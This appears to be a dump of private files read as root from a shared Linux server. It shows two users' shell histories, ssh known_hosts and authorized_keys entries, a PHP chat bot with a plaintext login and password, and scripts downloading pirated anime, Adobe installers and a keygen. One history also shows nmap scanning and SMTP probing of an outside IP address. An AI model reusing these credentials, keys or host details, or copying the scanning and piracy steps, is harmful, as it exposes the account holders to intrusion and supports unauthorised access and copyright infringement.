ping www.zloche.net
w
ping www.zloche.net
php WebServer.php
php WebServer.php
php WebServer.php
w
w
ping www.zloche.net
ping www.zloche.net
ls
cd zradio-script/
ls
mv The\ Arcade\ Fire\ -\ Wake\ Up.mp3 song.mp3
emacs server.php
php server.php
rm server.php
emacs server.php
php server.php
rm server.php
emacs server.php
php server.php
php server.php
--More--(76%)
rm server.php
emacs server.php
php server.php
rm server.php
emacs server.php
php server.php
rm server.php
emacs server.php
php server.php
rm server.php
emacs server.php
php server.php
rm server.php
emacs server.php
php server.php
rm server.php
emacs server.php
php server.php
rm server.php
emacs server.php
php server.php
w
w
--More--(80%)
w
w
w
top
ping www.zloche.net
w
w
w
ping server3
ping www.zloche.ne
ping www.zloche.net
w
w
w
cd ..
ls
cd irc-server/
ls
php IRC.php
whois 210.75.25.28
whois 210.75.0.0
whois 210.0.0.0
whois 210.75.0.0
--More--(83%)
ping 210.75.25.28
nmap 210.75.25.28
nmap -P0 210.75.25.28
w
telnet 210.75.25.28 25
cd msnbot/
ls
killall php
rm nohup.out
php msnbot.php
php msnbot.php
emacs msnbot.php
emacs msnbot.php
php msnbot.php
emacs msnbot.php
php msnbot.php
emacs msnbot.php
w
ls
cd msnbot/n
cd msnbot/
ls
emacs msnbot.php
--More--(86%)
top
killall php
php msnbot.php
emacs msnbot.php
php msnbot.php
w
r mno
du -csh nohup.out
rm -csh nohup.out
rm nohup.out
nohup php msnbot.php &
less nohup.out
w
ping www.zloche.net
w
w
w
ping www.zloche.net
w
who
ssh stax@irc.rasterized.net
w
ping www.zloche.net
--More--(89%)
ssh stax@irc.rasterized.net -p 443
w
w
w
ping www.zloche.net
ping www.zloche.net
w
ping www.zloche.net
w
who
who
ping www.zloche.net
w
ping www.zloche.net
ping server4
w
netstat
sudo bash
netstat
netstat -n
whois 207.46.107.41
netstat -n
netstat -n
--More--(92%)
netstat -n
w
w
w
who
who
netstat -n
netstat -n
less nohup.out
less nohup.out |grep laurent
less nohup.out |grep laurent
less nohup.out |grep laurent
less nohup.out |grep laurent
less nohup.out |grep laurent
less nohup.out |grep laurent
w
w
less nohup.out |grep laurent
netstat -n
ping www.zloche.net
ping irc.rasterized.net
whois 74.69.17.126
netstat -n
--More--(96%)
netstat -n
w
ping craplandia.org
ping craplandia.org
w
netstat -n
who
ssh root@www.zloche.net
cd msnbot/
cd admins/
ls
emacs n1ck.usr
CD ..
cd ..
nohup php msnbot.php &
r, admins/n1ck.usr
rm admins/n1ck.usr
cd msnbot/
ls
less nohup.out
w
ssh zloche@www.zloche.net
ssh zloche@www.zloche.net
server4:/home/stax# cd .ssh
server4:/home/stax/.ssh# ls -alh
total 16K
drwx------ 2 stax stax 4.0K Apr 4 18:43 .
drwxr-xr-x 25 stax stax 4.0K Jun 8 04:51 ..
-rw-r--r-- 1 stax stax 3.9K Jun 8 08:13 known_hosts
-rw-r--r-- 1 stax stax 1.3K Feb 7 00:39 known_hosts~
server4:/home/stax/.ssh# cat *
server1,65.92.156.62 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEAtWj3vqOrTzvLAHmMtiPCbMzwa+jYBcJOEVlE/
vKiWfqPWs5qSwV2fJxfofw09ZnZn3vujQmfdPB300tEh4rcqt7hCvqzodn7z9RFzm
KBTQcz65EDN86iHI/73gX7PjodHn+xGqx4O3fmJDENJ/7QKV3qCY3N1WB5HW/aTI+
cbDECDrAtScTzC/EuiVLmlAg2uSdCVc/ihOaGM7dEAmNWZnAvsZTGTqqKzpobD83V
BNAROR7qcrq4EdXTygEGr/FRQ8XyXtT2+EGwWBOez8+lja+wLTlplhGOEazVa+IrX
wVt7eMaSMM/3QKX0ZvZECQRBw2abfTXilT8G2QWLVPpTQ==
server3,80.248.208.223 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAzYgpHj6TWctv9JPyCM/uWdHMWWgnMmR9KkDXZ
uiGVSNc/FyxIq6soDPhQ6nsYw3NoKEczB1aC6u1RMqueWyd0LLZD2QIVmJ1ijRtQD
ibKXEmlquOTUNZzB0RQIKgI4FOlpojpqTMziRUom2qChYoVBFLimYvH+b3fclaQaS
ichE=
server2.zloche.net,65.94.84.21 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEAtWj3vqOrTzvLAHmMtiPCbMzwa+jYBcJOEVlE/
vKiWfqPWs5qSwV2fJxfofw09ZnZn3vujQmfdPB300tEh4rcqt7hCvqzodn7z9RFzm
KBTQcz65EDN86iHI/73gX7PjodHn+xGqx4O3fmJDENJ/7QKV3qCY3N1WB5HW/aTI+
cbDECDrAtScTzC/EuiVLmlAg2uSdCVc/ihOaGM7dEAmNWZnAvsZTGTqqKzpobD83V
BNAROR7qcrq4EdXTygEGr/FRQ8XyXtT2+EGwWBOez8+lja+wLTlplhGOEazVa+IrX
wVt7eMaSMM/3QKX0ZvZECQRBw2abfTXilT8G2QWLVPpTQ==
74.14.168.190 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEAtWj3vqOrTzvLAHmMtiPCbMzwa+jYBcJOEVlE/
vKiWfqPWs5qSwV2fJxfofw09ZnZn3vujQmfdPB300tEh4rcqt7hCvqzodn7z9RFzm
KBTQcz65EDN86iHI/73gX7PjodHn+xGqx4O3fmJDENJ/7QKV3qCY3N1WB5HW/aTI+
cbDECDrAtScTzC/EuiVLmlAg2uSdCVc/ihOaGM7dEAmNWZnAvsZTGTqqKzpobD83V
BNAROR7qcrq4EdXTygEGr/FRQ8XyXtT2+EGwWBOez8+lja+wLTlplhGOEazVa+IrX
wVt7eMaSMM/3QKX0ZvZECQRBw2abfTXilT8G2QWLVPpTQ==
server2 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEAtWj3vqOrTzvLAHmMtiPCbMzwa+jYBcJOEVlE/
vKiWfqPWs5qSwV2fJxfofw09ZnZn3vujQmfdPB300tEh4rcqt7hCvqzodn7z9RFzm
KBTQcz65EDN86iHI/73gX7PjodHn+xGqx4O3fmJDENJ/7QKV3qCY3N1WB5HW/aTI+
cbDECDrAtScTzC/EuiVLmlAg2uSdCVc/ihOaGM7dEAmNWZnAvsZTGTqqKzpobD83V
BNAROR7qcrq4EdXTygEGr/FRQ8XyXtT2+EGwWBOez8+lja+wLTlplhGOEazVa+IrX
wVt7eMaSMM/3QKX0ZvZECQRBw2abfTXilT8G2QWLVPpTQ==
server4,213.251.160.26 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA1nrkiWUjg+BGB83ed97xlvJYWNm8FeE91nhXx
05mZ4HVDADi0qGmYnlXbuywe7Kf4R42C5Gw+ZLMKdMYCsDqa89dqNuSl0Mx7/qHPS
3oQW/nPFC8cFo1pI6v/R180uxorB5ggcLV4mgbZZnc4TltUMbrLRHYfAi3HbwGj6b
IiuE=
70.53.252.108 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEAtWj3vqOrTzvLAHmMtiPCbMzwa+jYBcJOEVlE/
vKiWfqPWs5qSwV2fJxfofw09ZnZn3vujQmfdPB300tEh4rcqt7hCvqzodn7z9RFzm
KBTQcz65EDN86iHI/73gX7PjodHn+xGqx4O3fmJDENJ/7QKV3qCY3N1WB5HW/aTI+
cbDECDrAtScTzC/EuiVLmlAg2uSdCVc/ihOaGM7dEAmNWZnAvsZTGTqqKzpobD83V
BNAROR7qcrq4EdXTygEGr/FRQ8XyXtT2+EGwWBOez8+lja+wLTlplhGOEazVa+IrX
wVt7eMaSMM/3QKX0ZvZECQRBw2abfTXilT8G2QWLVPpTQ==
zloche.net ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAzYgpHj6TWctv9JPyCM/uWdHMWWgnMmR9KkDXZ
uiGVSNc/FyxIq6soDPhQ6nsYw3NoKEczB1aC6u1RMqueWyd0LLZD2QIVmJ1ijRtQD
ibKXEmlquOTUNZzB0RQIKgI4FOlpojpqTMziRUom2qChYoVBFLimYvH+b3fclaQaS
ichE=
70.55.196.23 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEAtWj3vqOrTzvLAHmMtiPCbMzwa+jYBcJOEVlE/
vKiWfqPWs5qSwV2fJxfofw09ZnZn3vujQmfdPB300tEh4rcqt7hCvqzodn7z9RFzm
KBTQcz65EDN86iHI/73gX7PjodHn+xGqx4O3fmJDENJ/7QKV3qCY3N1WB5HW/aTI+
cbDECDrAtScTzC/EuiVLmlAg2uSdCVc/ihOaGM7dEAmNWZnAvsZTGTqqKzpobD83V
BNAROR7qcrq4EdXTygEGr/FRQ8XyXtT2+EGwWBOez8+lja+wLTlplhGOEazVa+IrX
wVt7eMaSMM/3QKX0ZvZECQRBw2abfTXilT8G2QWLVPpTQ==
70.55.196.105 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEAtWj3vqOrTzvLAHmMtiPCbMzwa+jYBcJOEVlE/
vKiWfqPWs5qSwV2fJxfofw09ZnZn3vujQmfdPB300tEh4rcqt7hCvqzodn7z9RFzm
KBTQcz65EDN86iHI/73gX7PjodHn+xGqx4O3fmJDENJ/7QKV3qCY3N1WB5HW/aTI+
cbDECDrAtScTzC/EuiVLmlAg2uSdCVc/ihOaGM7dEAmNWZnAvsZTGTqqKzpobD83V
BNAROR7qcrq4EdXTygEGr/FRQ8XyXtT2+EGwWBOez8+lja+wLTlplhGOEazVa+IrX
wVt7eMaSMM/3QKX0ZvZECQRBw2abfTXilT8G2QWLVPpTQ==
www.zloche.net ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAzYgpHj6TWctv9JPyCM/uWdHMWWgnMmR9KkDXZ
uiGVSNc/FyxIq6soDPhQ6nsYw3NoKEczB1aC6u1RMqueWyd0LLZD2QIVmJ1ijRtQD
ibKXEmlquOTUNZzB0RQIKgI4FOlpojpqTMziRUom2qChYoVBFLimYvH+b3fclaQaS
ichE=
irc.rasterized.net,76.108.85.21 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAyaQ6kpWI3wBfCGF+/EGC8JLuPI4ahiREMNe0e
/vUAfFjT044zOVoowDC0Ek1wgh0TAuv3Dzjz6XxknwMkaYo/KCM+CmTAQqYGj4Awx
Urzy4ImUJNxvQVJxrHRL40B61lT+lSXpgsjBTaV4qWE5vTIMoa9uz1159D5CpHMuA
KU70=
www.zloche.net,80.248.208.223 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAzYgpHj6TWctv9JPyCM/uWdHMWWgnMmR9KkDXZ
uiGVSNc/FyxIq6soDPhQ6nsYw3NoKEczB1aC6u1RMqueWyd0LLZD2QIVmJ1ijRtQD
ibKXEmlquOTUNZzB0RQIKgI4FOlpojpqTMziRUom2qChYoVBFLimYvH+b3fclaQaS
ichE=
www.zloche.com,81.93.5.180 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAtSbs8/VCyV0KAFHWmggnC3QHa2qh9AYdUYE4O
rbUK7oA4Ozq8D5V2GYhBmpkMvYcCENNi7cxyeTEMdEeBWok/zRcxRkGYAxM7Zg2Ns
bIez9+bB1ojKy5BoNLsocoQbvzgVbxOXHvRwcWTGK9H7Yq8ZJPLC4ezsOpAcyTeBH
EeuM=
server1,65.92.158.240 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAziexE08HtpgQFXCsqn1Hg0bn54ZzecIYNyNZz
wK45zhO03/wr3pGmQtZQbv9R2Jma/vSW7IFPmz2ZyZodLpr3QciqqPOn5xvC7GFLr
rrlBYzX8uggew4gUq9Uc9vxXrDKHh2aAz7rA+gPOM/1iq1Xuve754ZTOhdSXaasNJ
Mb4U=
server1.zloche.net ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAziexE08HtpgQFXCsqn1Hg0bn54ZzecIYNyNZz
wK45zhO03/wr3pGmQtZQbv9R2Jma/vSW7IFPmz2ZyZodLpr3QciqqPOn5xvC7GFLr
rrlBYzX8uggew4gUq9Uc9vxXrDKHh2aAz7rA+gPOM/1iq1Xuve754ZTOhdSXaasNJ
Mb4U=
irc2.zloche.net ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEAt9hfTe460T8l2oPkq3WD7fnie6fzIWH9ep1HX
8NVSzLFT+fUlLzgpWUU+g1HycYAV4S5nSfG3FSsPfeEETXzBaaYeAU87qn3vtjuRU
7Fp5Tv6mPnFiOJuDwJ4wG3yA8+oyRzTMThfhnGDP+H90eacVPjxoTN0lQiM3VvmhR
4j9rTfaVkx9BDmUz2sorEMAHcpajK3h2dB124tiNR/IggGvXmwPUJym10O1QZKVrj
Ckdbacz9zV4ROmc5c/hucKGwZH9mOW+Zo1GB2OP7LHMPPCmO7qymvG67eOsyc/QmB
QcsqBSPYmC1xNms9c6cbnZeUvjYFY0rfQql39oytXeJ7w==
server4:/home/stax/.ssh# cd ..
server4:/home/stax# cat b0t.php
<?php
$address = "www.zloche.net";
$movetime = 5;
$lastmovement = time();
$lastmovement = 9999999999999999999999999999999;
$port = 22222;
$lastasked = time();
$boss = array('stax','zokio');
$user = 'yotlm';
$pass = 'asdfasdf';
$socket = fsockopen( $address , $port );
fwrite($socket, "INIT=2963739=" . $user . "=1=10sssss=" . $pass . "=bot" .
chr(0));
//fwrite($socket, "TELEPORTSPOT=32=255=255" . chr(0));
$suivre = 0;
$clients = array();
while(true)
{
socket_set_blocking($socket,false);
$input = rtrim(fgets($socket));
$input = str_replace(chr(0),'',$input);
$comp = split('=',$input);
if(strlen($input) > 2)
{
//echo "\n\n\n" . $comp[0] . "\n\n\n";
//echo $input . "\n";
}
if($comp[0] == 'MSG')
{
$message = split('=',$input,3);
$message = $message[2];
$message = explode(chr(0),$message);
$message = $message[0];
echo '<' . $comp[1] . '> ' . $message . "\n";
}
$say = file_get_contents("say");
if ($say != "") {
fputs($socket,"MSG==Zokio=:-::::".$say.chr(0));
unlink("say");
$file = "say";
$fp = fopen($file,"w+");
fwrite($fp,"");
fclose($fp);
}
//echo "\n\n\n" . $comp[0] . "\n\n\n";
if($comp[0] == 'PING')
{
fwrite($socket,"PONG=" . $comp[1] . chr(0));
}
if($comp[0] == 'KICK')
{
$socket = fsockopen( $address , $port );
fwrite($socket, "INIT=2963739=" . $user . "=1=10sssss=" . $pass . "=bot" .
chr(0));
fwrite($socket, "TELEPORTSPOT=32=255=255" . chr(0));
}
/*
$socket = fsockopen( $address , $port );
fwrite($socket, "INIT=2963739=" . $user . "=1=10sssss=" . $pass . "=bot" .
chr(0));
fwrite($socket, "TELEPORTSPOT=72=255=255" . chr(0));
*/
//EWONE=3784=10=4=3=250D48=8753E1=2B7ED7=franco==.
if($comp[0] == 'NEWONE')
{
$clients["" . strtolower($comp[8]) . ""] = $comp[1];
//echo 'test';
echo $clients["" . strtolower($comp[8]) . ""];
foreach($clients as $value)
{
echo $value . "\n";
}
}
if($comp[0] == 'CLICK')
{
if($comp[1] == $suivre)
{
fwrite($socket,'CLICK=' . $comp[2] . '=' . $comp[3] . chr(0));
}
}
//MSG=xxladyxx=toi mon ange qui vole emaine moi pour ne plus soufrire dans t
//bras sa jlai inventer il a 2 semaine .
if($comp[0] == 'MSG')
{
$comp2 = split('=',$input,3);
$quiadit = $comp2[1];
$aditquoi = $comp[2];
if(strtolower($aditquoi) == '!version')
{
echo '11111!!!!!';
$temp = time() - $lastasked;
if($temp >= 1)
{
$lastasked = time();
fwrite($socket,'MSG==undefined=:-::::REALB0T V1.1 - par Stax' . chr(0));
}
//MSG==undefined=:-::::/msg whitehack ^^.
}
/*if(strtolower($aditquoi) == '!version')
{
echo '11111!!!!!';
$temp = time() - $lastasked;
if($temp >= 1)
{
$lastasked = time();
fwrite($socket,'MSG==undefined=:-::::REALB0T V1.1 - par Stax' . chr(0));
}
//MSG==undefined=:-::::/msg whitehack ^^.
}
*/
if(preg_match("#^!emotion (.+)#i", $aditquoi) )
{
//echo '11111!!!!!';
$temp = time() - $lastasked;
if($temp >= 1)
{
$lastasked = time();
$tobsaid = explode('!emotion ',$comp[2],2);
$tobsaid = $tobsaid[1];
fwrite($socket,'EMOTEID='. $tobsaid . chr(0));
}
//MSG==undefined=:-::::/msg whitehack ^^.
}
if(preg_match("#^!suis (.+)#i", $aditquoi) )
{
$suivrelui = explode('!suis ',$comp[2]);
$suivrelui = $suivrelui[1];
$suivre = $clients[strtolower($suivrelui)];
}
//MSG==undefined=:-::::/msg whitehack ^^.
if(preg_match("#^!dit (.+)#i", $aditquoi) )
{
//echo '11111!!!!!';
$temp = time() - $lastasked;
if($temp >= 1)
{
$lastasked = time();
$tobsaid = explode('!dit ',$comp[2],2);
$tobsaid = $tobsaid[1];
fwrite($socket,'MSG==undefined=:-::::' . $tobsaid . chr(0));
}
//MSG==undefined=:-::::/msg whitehack ^^.
}
if(preg_match("#^!click (.+)#i", $aditquoi) )
{
//echo '11111!!!!!';
$temp = time() - $lastasked;
if($temp >= 1)
{
$lastasked = time();
$tobsaid = explode(' ',$comp[2]);
//$tobsaid = $tobsaid[1];
fwrite($socket,'CLICK=' . $tobsaid[1] . '=' . $tobsaid[2] . chr(0));
}
//MSG==undefined=:-::::/msg whitehack ^^.
}
if(strtolower($aditquoi) == '!boss')
{
echo '11111!!!!!';
$temp = time() - $lastasked;
if($temp >= 1)
{
$lastasked = time();
fwrite($socket,'MSG==undefined=:-::::Le boss, c est STAX!!!!!!!' . chr(0));
}
//MSG==undefined=:-::::/msg whitehack ^^.
}
if(strtolower($aditquoi) == '!moonwalk')
{
//echo '11111!!!!!';
$temp = time() - $lastasked;
if($temp >= 1)
{
$lastasked = time();
fwrite($socket,'CLICK==' . chr(0));
fwrite($socket,'CLICK=0=0' . chr(0));
//fwrite($socket,'CLICK==' . chr(0));
}
//MSG==undefined=:-::::/msg whitehack ^^.
}
if(strtolower($aditquoi) == '!bouger')
{
$lastmovement = time() - 5;
//$lastmovement = 9999999999999999999999999999999;
}
//MSG==undefined=:-::::/msg whitehack ^^.
if(strtolower($aditquoi) == '!stop.bouger')
{
//$lastmovement = time() - 5;
$lastmovement = 9999999999999999999999999999999;
}
//MSG==undefined=:-::::/msg whitehack ^^.
if(strtolower($aditquoi) == '!date')
{
$temp = time() - $lastasked;
if($temp >= 1)
{
$lastasked = time();
fwrite($socket,'MSG==undefined=:-::::la Date : ' . date("m/d/y H:i:s") .
chr(0));
}
//MSG==undefined=:-::::/msg whitehack ^^.
}
}
$temp11 = time() - $lastmovement;
if($temp11 >= $movetime)
{
fwrite($socket,'CLICK=' . mt_rand(25,400) . '=' . mt_rand(25,400) . chr(0));
$lastmovement = time();
}
}
ver4:/home/stax# cat meh.sh
wget http://88.191.14.73/awarefirst/Blood+/Blood+_02_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_03_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_04_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_05_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_06_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_07_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_08_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_09_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_10_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_11_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_12_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_13_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_14_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_15_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_16_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_17_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_18_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_19_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_20_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_21_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_22_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_23_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_24_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_25_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_26_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_27_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_28_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_29_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_30_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_31_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_32_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_33_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_34_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_35_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_36_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_37_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_38_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_39_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_40_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_41_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_42_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_43_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_44_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_45_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_46_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_47_DVD_anime-master_fr.rar
wget http://88.191.14.73/awarefirst/Blood+/Blood+_48_DVD_anime-master_fr.rar
wget
http://88.191.14.73/awarefirst/Blood+/Blood+_49_DVD_anime-master_fr.rarserver4:/home/stax#
server4:/home/stax# cd ..
server4:/home# cd gumbie/
server4:/home/gumbie# ls -alh
total 263M
drwxr-xr-x 10 gumbie gumbie 4.0K May 30 04:45 .
d-wx--s--x 17 root root 4.0K May 6 03:51 ..
-rw-r--r-- 1 gumbie gumbie 266 Jan 28 17:50 .alias
-rw------- 1 gumbie gumbie 3.6K Jun 9 05:53 .bash_history
-rw-r--r-- 1 gumbie gumbie 567 Jan 28 17:50 .bash_profile
-rw-r--r-- 1 gumbie gumbie 1.8K Jan 28 17:50 .bashrc
-rw-r--r-- 1 gumbie gumbie 375 Jan 28 17:50 .cshrc
-rw-r--r-- 1 gumbie gumbie 14 Feb 3 16:25 .screenrc
drwx--x--- 2 gumbie gumbie 4.0K Feb 3 16:12 .ssh
drwxr-xr-x 4 gumbie gumbie 4.0K May 27 17:35 Apps
-rw-r--r-- 1 gumbie gumbie 95M May 27 18:08 Backup
drwxr-xr-x 2 gumbie gumbie 4.0K May 27 17:49 Backups
drwxr-xr-x 5 gumbie gumbie 4.0K Jun 1 05:52 Incoming
-rw-r--r-- 1 gumbie gumbie 168M May 30 04:54
Ircd_Services_Backup-052907.tar.bz2
drwxr-xr-x 2 gumbie gumbie 4.0K May 27 17:47 Text
drwxr-xr-x 2 gumbie gumbie 4.0K May 27 17:43 Work
drwxr-xr-x 6 gumbie gumbie 4.0K Jun 3 22:15 public_html
drwxr-xr-x 6 gumbie gumbie 4.0K May 27 17:47 wifi
server4:/home/gumbie# cat .bash_history
w
lastlog | less
last | less
ls /
ps aux | less
ps auxww | less
id
ulimits
ulimit -a
free
uptime
sudo su -
passwd
ls -la .ssh
chmod o-xr .ssh
pico .ssh/authorized_keys
pico .screenrc
sudo su -
uptime
screen -x
vmstat
sudo su -
uname -s
uname -a
ls /usr/src
df
screen -e^Gg
screen
sudo su -
screen -e^Gg
screen -e^Gg
screen -x
screen -x
screen -x
screen -x
screen -x
screen -x
screen -x
w
w
mkdir Incoming
ls /home
adduser ircd
sudo su-
sudo su -
screen -x
sudo su -
ps x
kill -9 3237
screen -e^Gg
passwd
ssh zloche.net
ssh zloche.net
ssh zloche.net
sudo su -
sudo su -
ssh zloche.net
ssh zloche.net
sudo su -
screen -x
screen -x
screen -wipe
screen -e^Gg
ncftp server3
apt-get install ncftp
sudo su -
rm -rf Electronics_Apps
ls
sudo su -
ls
mkdir public_html
mv Electronic_Apps/ public_html/
ls -la public_html/
cd public_html/Electronic_Apps/
ls
cd Xlinx/
ls
rm -rf Xten.Networks.X-Pro.v2.2.2.ALL.PPC.Retail-DVTPDA/
ls
ls -l
rm *linux*
rm *Linux*
ls
cd public_html/
ls
cd Electronic_Apps/
ls
cd Xlinx/
ls-l
ls -l
df
cd ..
screen -x
df
du | tail
cd public_html/
ls
ls Electronic_Apps/
mv Electronic_Apps/Ebooks/ .
ls
ls -l
ls
ls -la
cd ..
ls -la
less .alias
screen -x
screen -x
screen -x
screen -x
screen -x
screen -x
screen -x
cd public_html/
rz
screen -x
rz
screen -x
screen -x
ls -l
df
mkdir Backups
mv NagiosAgent_nrpe.tgz roots_new_s3_apps.tar.bz2 Backups/
ls
cd New
mkdir DW
cd DW
man wget
wget -b
http://201.221.144.232/Appz/Adobe.Dreamweaver.CS3/Adobe.Dreamweaver.CS3.exe
ps x
wget -b http://201.221.144.232/Appz/Adobe.Dreamweaver.CS3/DW-CS3-Keygen.exe
wget -b
http://201.221.144.232/Appz/Adobe.Dreamweaver.CS3/DWcs3-Medicina-www.ProgramasFull.com.rar
wget =b
http://chaiyaphum.nfe.go.th/download/program/Macromedia%20Dreamweaver%20MX/Macromedia%20Dreamweaver%20MX/Serial%20No.txt
wget -b
http://chaiyaphum.nfe.go.th/download/program/Macromedia%20Dreamweaver%20MX/Macromedia%20Dreamweaver%20MX/Serial%20No.txt
fg
jobs
ps x
wget -b
http://chaiyaphum.nfe.go.th/download/program/Macromedia%20Dreamweaver%20MX/Macromedia%20Dreamweaver%20MX/Setup.exe
tail -F wget-log*
ps x
ps xw
ps xww
ls
ps xww
fg
tail -F wget-log*
watch tail -F wget-log*
watch tail wget-log*
tcsh
fg
tail -F wget-log*
ps xww
df
df
ps xww
fg
tail -F wget-log*
ps xqq
ps xww
fg
ls -l
ls -l
ls -l
ps xww
fg
screen -x
screen -e^Tt
screen -x
screen -e^Tt
screen -x
screen -x
screen -x
cd DW
ls
sz *
screen -x
screen -x
screen -x
ls
ls Apps/
ls
ls DW
mv DW Apps/Dreamweaver
ls
ls Incoming/
ls public_html/
df
ls
cd public_html/
ls
cd Ebooks/
ls
cd Programming/Perl/
ls -la
less index.html
ls
ls -l
ls ..
ls ../python
ls ../Python/
ls -l ../Python/
ls -la ../Python/
mv index.html index.html-broken
ls
cd Incoming/
rz
ls
tar -tzf snort-2.7.0.beta2.tar.gz
tar -xzf snort-2.7.0.beta2.tar.gz
cd snort-2.7.0.beta2
ls
./configure --help
./configure
rz
mv libpcap-0.8.1.tar.tar libpcap-0.8.1.tar.gz
tar -tzf libpcap-0.8.1.tar.gz
tar -xzf libpcap-0.8.1.tar.gz
mv libp*
ls libp*
mv libp* ..
cd ../libpcap-0.8.1
ls
./configure
make
sudo make install
cd ../snort-2.7.0.beta2
./configure
cd .. ; lynxhttp://www.pcre.org
lynx http://www.pcre.org
tar -tzf pcre-7.1.tar.gz
tar -xzf pcre-7.1.tar.gz
cd pcre-7.1
ls
./configure
make
sudo - make install
sudo make install
cd ../snort-2.7.0.beta2
./configure
make
make install
sudo make install
ls
cd doc
ls
cp ../doc ~/public_html/snort_doc
cp -R ../doc ~/public_html/snort_doc
cd ..
ls
ls etc
less etc/snort.conf
ls
ls etc
ls templates/
ls con
ls contrib/
ls schemas/
ls src
ls rpm
ls m4
ls doc
less doc/README.ssh
screen -x
screen -x
ls
ls public_html/
mkdir public_html/Cracks
cd public_html/Cracks
rz
ls -la
screen -x
screen -x
screen -x
screen -x
server4:/home/gumbie# cd .ssh
server4:/home/gumbie/.ssh# ls -alh
total 20K
drwx--x--- 2 gumbie gumbie 4.0K Feb 3 16:12 .
drwxr-xr-x 10 gumbie gumbie 4.0K May 30 04:45 ..
-rw-r--r-- 1 gumbie gumbie 4.6K Feb 3 16:18 authorized_keys
-rw-r--r-- 1 gumbie gumbie 3.4K Mar 24 03:26 known_hosts
server4:/home/gumbie/.ssh# cat *
ssh-dss
AAAAB3NzaC1kc3MAAACBAIkoc5RisBTJmtAUFmSedLFXUOtADHiPUNVgvS3aEJ/
EauJM8Bvldd7AlNL2IoW+BVyI9qQ9F5u7ck925L3LFO2DySquqTUvu6wC1hcG+Q
JmLvXWdZlp7qqiaVhQPspf++3PnpL/9W3Ls06CJTkRpWFb5pyBeB5srYv+pO26i
1xfAAAAFQCDQHjFR6JYK2BMfYzeqv5el4fsJQAAAIBQZW0fqGNmIxFANmeHcAWU
